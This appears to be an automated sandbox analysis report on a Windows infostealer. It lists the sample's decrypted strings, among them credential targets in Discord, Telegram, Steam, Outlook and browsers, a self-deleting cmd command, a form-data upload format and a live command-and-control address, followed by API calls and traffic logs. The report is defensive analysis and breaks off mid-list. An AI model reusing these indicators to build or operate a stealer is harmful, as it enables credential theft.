Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - OS:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Language:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: All Users:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Current User:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process List:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: .exe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: runas
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: open
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /c start
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: files
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \discord\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: key_datas
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: map*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Telegram
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Tox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.tox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.ini
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Password
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000001
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000002
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000003
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000004
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: token:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \config\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: browsers
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: done
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: soft
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: https
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: POST
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: hwid
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: build
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: token
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: file_name
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: file
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: message
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: screenshot.jpg
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sleep
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sscanf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: http://85.28.47.31
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: silence
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sila
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32First
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindClose
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCW

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00418940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0040C660
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00407280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00409B10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C83A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8344C0 PK11_PubEncrypt,	0_2_6C8344C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C804420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C804420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C834440 PK11_PrivDecrypt,	0_2_6C834440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C8825B0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ead6a72944.exe	Unpacked PE file: 28.2.ead6a72944.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61302 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb61252224y source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inisP~ source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbes source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831BSOFTWARE\WOW6432Node\Valve\Steams source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 